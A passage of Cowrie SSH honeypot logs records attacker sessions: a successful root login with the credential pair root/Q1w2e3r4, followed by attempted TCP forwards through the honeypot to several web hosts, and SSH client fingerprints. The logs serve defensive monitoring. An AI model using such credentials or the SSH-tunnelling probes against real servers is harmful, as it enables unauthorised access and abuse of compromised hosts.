client hassh fingerprint: 390ffe68a68c2a2891210413e80689fa","sensor":"my-vps","timestamp":"2025-08-26T23:40:25.449811Z","src_ip":"212.227.235.229","session":"43e24c08c934"}
{"eventid":"cowrie.login.success","username":"root","password":"Q1w2e3r4","message":"login attempt [root/Q1w2e3r4] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:40:25.941535Z","src_ip":"212.227.235.229","session":"43e24c08c934"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"54.171.12.40","dst_port":443,"src_ip":"212.227.235.229","src_port":44802,"message":"direct-tcp connection request to 54.171.12.40:443 from 127.0.0.1:44802","sensor":"my-vps","timestamp":"2025-08-26T23:40:27.174227Z","session":"43e24c08c934"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"54.171.12.40","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x9f\\xef\\xbck\\xe9\\xb5\\x10\\xcd\\xca\\x91\\xef5\\x90d\\x7f?s\\xd4\\xbe\\xfc\\x10\\xe0\\xea^(\\x82\\xc5\\xc8ZD\\x17$ \\xce\\x88\\x81z\\x06v\\x13l\\x0b\\xa5\\xd8D\\x01\\xf7#r\\xa5\\x13\\xf2:x{*r\\xac\\xc4\\xf1\\x05\\x98\\x856?\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xa4\\x8e\\xcc\\x7f\\xa5q\\xdeMi\\xa5?5\\x12\\xca\\xcfL\\xcf\\xa5\\x87YP\\xe2\\x92\\x03\\x19\\xf8\\x9f\\xdf\\xe8\\xdd-\\x1e\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":0,"message":"discarded direct-tcp forward request 0 to 54.171.12.40:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x9f\\xef\\xbck\\xe9\\xb5\\x10\\xcd\\xca\\x91\\xef5\\x90d\\x7f?s\\xd4\\xbe\\xfc\\x10\\xe0\\xea^(\\x82\\xc5\\xc8ZD\\x17$ \\xce\\x88\\x81z\\x06v\\x13l\\x0b\\xa5\\xd8D\\x01\\xf7#r\\xa5\\x13\\xf2:x{*r\\xac\\xc4\\xf1\\x05\\x98\\x856?\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xa4\\x8e\\xcc\\x7f\\xa5q\\xdeMi\\xa5?5\\x12\\xca\\xcfL\\xcf\\xa5\\x87YP\\xe2\\x92\\x03\\x19\\xf8\\x9f\\xdf\\xe8\\xdd-\\x1e\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T23:40:27.468692Z","src_ip":"212.227.235.229","session":"43e24c08c934"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"23.53.112.242","dst_port":443,"src_ip":"212.227.235.229","src_port":45106,"message":"direct-tcp connection request to 23.53.112.242:443 from 127.0.0.1:45106","sensor":"my-vps","timestamp":"2025-08-26T23:40:27.621285Z","session":"43e24c08c934"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"23.53.112.242","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x87Wy\\xa5\\xff\\r\\xc8\\xa4\\xb4\\x9b\\x04b\\xf5\\x1d\\xdd\\x8b\\xeeC\\xa0\\xd3\\xfc\\xe7l\\x83D\\xb5\\x8ba\\xfb\\xad\\x84; \\xd6\\x81(\\xd4\\x8b\\x97\\x0f\\xc17\\xc1\\x0c\\xa2\\x14\\xa1\\x15\\xcao\\xa4!\\xd0\\xc8_\\xca\\xae>\\x81MU\\xd1\\xf1\\\\\\xd3\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 ]\\xf1\\x03\\xb0<FT\\xb3\\x83\\xd5}`\\x1a\\xe0\\xa7\\xfc\\xb0X'\\xd9\\xb9\\x0e\\x8e[\\xde\\x96\\xf9\\xca|\\xbf\\xe9k\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":1,"message":"discarded direct-tcp forward request 1 to 23.53.112.242:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x87Wy\\xa5\\xff\\r\\xc8\\xa4\\xb4\\x9b\\x04b\\xf5\\x1d\\xdd\\x8b\\xeeC\\xa0\\xd3\\xfc\\xe7l\\x83D\\xb5\\x8ba\\xfb\\xad\\x84; \\xd6\\x81(\\xd4\\x8b\\x97\\x0f\\xc17\\xc1\\x0c\\xa2\\x14\\xa1\\x15\\xcao\\xa4!\\xd0\\xc8_\\xca\\xae>\\x81MU\\xd1\\xf1\\\\\\xd3\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 ]\\xf1\\x03\\xb0<FT\\xb3\\x83\\xd5}`\\x1a\\xe0\\xa7\\xfc\\xb0X'\\xd9\\xb9\\x0e\\x8e[\\xde\\x96\\xf9\\xca|\\xbf\\xe9k\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T23:40:27.816388Z","src_ip":"212.227.235.229","session":"43e24c08c934"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.179.132","dst_port":443,"src_ip":"212.227.235.229","src_port":45210,"message":"direct-tcp connection request to 142.250.179.132:443 from 127.0.0.1:45210","sensor":"my-vps","timestamp":"2025-08-26T23:40:27.957902Z","session":"43e24c08c934"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.179.132","dst_port":443,"data":"b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xfb*J\\xe0\\xfa\\x86\\x00K\\xdf*Z\\xee\\x04A\\xb7[\\x1a} \\xe1\\xcec\\xd7\"\\xb9\\xff\\t{o\\x1d\\xef\\xbe \\x1d\\x94Y\\x9fQ\\xc5P\\x1d\\x06D\\xd9GW\\xc3\\x84D\\xc0T\\xe5\"6\\xe1\\x87r\\xf9\\xf3d\\xe9\\x96\\x1f\\xb5m\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x06;\\x0e\\xc3\\xcc\\x00=\\xd6}n&\\xf3\\xec\\xa04\"\\xd3#z\\xeedr.$h\\'t\\xfb;\\xef\\x94\\n\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","id":2,"message":"discarded direct-tcp forward request 2 to 142.250.179.132:443 with data b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xfb*J\\xe0\\xfa\\x86\\x00K\\xdf*Z\\xee\\x04A\\xb7[\\x1a} \\xe1\\xcec\\xd7\"\\xb9\\xff\\t{o\\x1d\\xef\\xbe \\x1d\\x94Y\\x9fQ\\xc5P\\x1d\\x06D\\xd9GW\\xc3\\x84D\\xc0T\\xe5\"6\\xe1\\x87r\\xf9\\xf3d\\xe9\\x96\\x1f\\xb5m\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x06;\\x0e\\xc3\\xcc\\x00=\\xd6}n&\\xf3\\xec\\xa04\"\\xd3#z\\xeedr.$h\\'t\\xfb;\\xef\\x94\\n\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","sensor":"my-vps","timestamp":"2025-08-26T23:40:28.541987Z","src_ip":"212.227.235.229","session":"43e24c08c934"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:40:28.753188Z","src_ip":"212.227.235.229","session":"43e24c08c934"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60020,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8cb8c37461c","protocol":"ssh","message":"New connection: 217.72.205.35:60020 (1.2.3.4:22) [session: f8cb8c37461c]","sensor":"my-vps","timestamp":"2025-08-26T23:41:04.606019Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:41:04.607442Z","src_ip":"217.72.205.35","session":"f8cb8c37461c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49998,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7efb8fc81bd","protocol":"ssh","message":"New connection: 212.227.235.229:49998 (1.2.3.4:22) [session: b7efb8fc81bd]","sensor":"my-vps","timestamp":"2025-08-26T23:41:10.318980Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:41:10.319752Z","src_ip":"212.227.235.229","session":"b7efb8fc81bd"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-26T23:41:10.408580Z","src_ip":"212.227.235.229","session":"b7efb8fc81bd"}
